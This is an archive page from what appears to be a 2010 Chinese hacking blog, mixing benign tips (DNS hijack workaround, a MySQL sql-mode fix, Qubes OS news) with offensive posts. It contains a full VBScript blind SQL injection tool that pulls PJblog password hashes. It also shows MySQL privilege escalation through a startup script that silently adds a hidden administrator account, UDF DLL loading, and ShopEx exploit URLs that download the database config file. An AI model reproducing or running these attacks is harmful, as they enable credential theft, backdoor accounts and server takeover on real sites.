存档

作者存档

超级简单封杀114域名劫持

2010年8月11日 2 条评论

       你是不是常常遇到敲错一个域名的时候,会自动跳转到114的网站?如下图所示:

        这就是dns在搞怪,劫持了域名 。转向垃圾广告词我也忍了,但今天居然直接弹窗转到XX游戏网站上,可谓是无耻之极……

解决方法超级简单,估计大多数都知道,在这里记录下留给需要的人:

方法一、

打开IE->工具->Internet t选项->安全->受限站点 把刚才的站点添加进去

方法二、使用google的DNS 8.8.8.8

方法三、修改本地host文件,这个略为麻烦也不实用,像上图中这个并不是直接是XX.114.com的,不同的区域可能被劫持的域名不同。

推荐使用方法二!毕竟google不会那样无耻
 

分类: 资源共享 标签:

mysql ERROR 1366 解决方法

2010年8月10日 7 条评论

作者:不走的钟
来源:http://www.007hack.com/?p=585

     最近忙项目,网站好久没更新了!今天在调试代码时发现问题记录下来!

    代码移置时mysql5.1提示如下错误:

“ERROR 1366 (HY000): Incorrect integer value:”

产生的原因是mysql5.1默认sql-mode为:

sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION"

解决方法:

# sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION"
sql-mode="NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION"
分类: 安装配制 标签: ,

PJblog V3.0 0day Vbs版漏洞利用工具

2010年5月21日 没有评论

这个漏洞出来很久了,收藏下!

If WScript.Arguments.Count <> 2 Then
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
        WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
        WScript.Echo "恭喜!存在漏洞"
Else
        WScript.Echo "没有检测到漏洞"
        WScript.Quit
End If

For n=1 To 40
        For i=1 To 17
                strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
                If Not IsSuccess(strInject) Then
                        strResult = strResult & Mid(SHA1Charset, i-1, 1)
                        Exit For
                End If
                strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
                WScript.StdOut.Write strPrint
        Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"

Function PostData(PostUrl)
        Dim Http
        Set Http = CreateObject("msxml2.serverXMLHTTP")
        With Http
                .Open "GET",PostUrl,False
                .Send ()
                PostData = .ResponseBody
        End With
        Set Http = Nothing
        PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
        Dim strReturn
        Dim I, ThisCharCode, NextCharCode
        strReturn = ""
        For I = 1 To LenB(vIn)
                ThisCharCode = AscB(MidB(vIn, I, 1))
                If ThisCharCode < &H80 Then
                        strReturn = strReturn & Chr(ThisCharCode)
                Else
                        NextCharCode = AscB(MidB(vIn, I + 1, 1))
                        strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
                        I = I + 1
                End If
        Next
        bytes2BSTR = strReturn
End Function

Function IsSuccess(PostUrl)

strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData,"check_error") >0 then
        IsSuccess = True
Else
        IsSuccess = False
End If
'Wscript.Sleep 500 '让系统休息一下
End Function
分类: 漏洞收集 标签:

windows 2008 mysql 提权

2010年5月17日 1 条评论

作者:不走的钟
来源:http://www.007hack.com/?p=567
         mysql 5.1版本以上,必须把udf文件放到mysql安装目录下的lib/plugin下才能创建自定义函数,mysql into dumpfile并不能创建文件夹,所以mysql 5.1以上的版本,root权限提权就很困难了,目前已有的方法只有写启动项如下:

create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user 007hack.com qwer1234!@#$qwe /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 007hack.com /add"",0) " );

 

windows 2008启动项:

C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs
select * from a into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs";

 

写启动项缺陷:
1、需要服务器重启(如果管理员3389远程桌面登陆时注销了用户,再次3389连接时,这个脚本就会运行,添加一个管理员,不需要重启)。
2、安全软件可能会拦截。

 

补充:
如果mysql小于5.1是root权限,windows 2008一样可以拿到系统权限(mysql无降权处理)
1、mysql导出一个dll

SELECT udf FROM 007hack_tab INTO DUMPFILE 'c:/007hack.dll

//udf内容网上早有公开

2、创建一个函数

create function myconnect returns integer soname 'c:\\007hack.dll

//c盘要可以写,注意是”\\”

3、调用这个函数

select myconnect('".$chost."','".$cport."')

//这只是一个例子

Shopex V4.8.4-4.8.5通杀漏洞

2010年4月24日 没有评论

作者:未知

影响版本:shopex V4.8.4 -V4.8.5

shopex 官方简介:

      上海商派网络科技有限公司始于2002年,是国内最早的网店软件提供商之一;是目前国内网店系统持续研发最久的公司;是目前网店软件国内市场占有率最高的软件提供商;是目前网店软件行业内规模最大的公司。ShopEx旗下的网上商店系统、网上商城系统以及丰富的网商工具,以专业的功能、领先的技术以及快速的价值体现,获得了45万用户的肯定。ShopEx秉承”向客户提供最专业的购物模式,做最好的网络购物软件”之理念,一直走在网络购物模式的前沿,致力于最大限度的降低网络购物系统建设成本,并为让网络购物、让电子商务更加走近普通人的生活而不断努力。

漏洞利用:

直接下载数据库配置文件:
http://www.007hack.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

暴网站绝对路径:
http://www.007hack.com/install/svinfo.php?phpinfo=true

不走的钟提示Shopex非开源系统,本站不能提供解决方法,请大家随时关注官方补丁!

女黑客开发新的安全操作系统Qubes

2010年4月14日 没有评论

ubes的最大优点就是安全。它充分利用了虚拟化技术(基于安全虚拟机Xen),所有用户应用程序都运行在AppVM(基于Linux的轻量级虚 拟机)中,彼此隔离。而联网代码使用IOMMU/VT-d放在一个非特权虚拟机中,在特权域 (dom0) 中没有任何联网代码。许多系统级组件放在沙盒中,以避免互相影响。

据Slashdot 报道,著名的波兰美女黑客Joanna Rutkowska最近发布了一个基于Xen、X和Linux的新开源操作系统,称为Qubes。

Qubes的最大优点就是安全。它充分利用了虚拟化技术(基于安全虚拟机 Xen),所有用户应用程序都运行在AppVM(基于Linux的轻量级虚 拟机)中,彼此隔离。而联网代码使用IOMMU/VT-d放在一个非特权虚拟机中,在特权域 (dom0) 中没有任何联网代码。许多系统级组件放在沙盒中,以避免互相影响。

 

另外,Qubes允许用户自己定义许多安全域(用轻量级虚拟机实现),比如“个人”、“工作”、 “购物”、“银行”等,彼此隔离。另外,也支持各安全域之间复制-粘贴和文件共享。

 

虽然这个操作系统仍然处于早期开发阶段,但是由于Joanna的声望,它还是引起了社区的广 泛关注。有评论认为,这一想法很有新意,但还算不上革命性的产品。

据Joanna在博文中介绍,这个操作系统已经可以使用,她自己大部分日常工作 都在之上完成,包括该操作系统本身的开发。

项目首页:http://qubes-os.org/Home.html(不 稳定)
Joanna Rutkowska,著名 波兰安全研究人员,擅长底层安全和恶意软件方面的研究。她小学时就对操作系统内核产生了兴趣,学习了DOS汇编语言。后来转向 Linux系统和内核开发。

2006年8月她在Black Hat Briefings会议上发表了对Vista内核保护机制的攻击方案(破解了驱动认证机制并植入一个Rootkit),引起轰动,被《eWeek Magazine》评为2006年五大黑客。此外,她的著名作品还包括绰号Blue Pill(蓝色药丸)的技术,用硬件虚拟化将一个正在运行的操作系统移到虚拟机中。

2007年她创立了非盈利性的机构Invisible Things Lab。主要关注操作系统和虚拟机方面的安全问题。

2009年,她又曝光了Intel CPU上的一个缓存漏洞。

分类: 业界资讯 标签: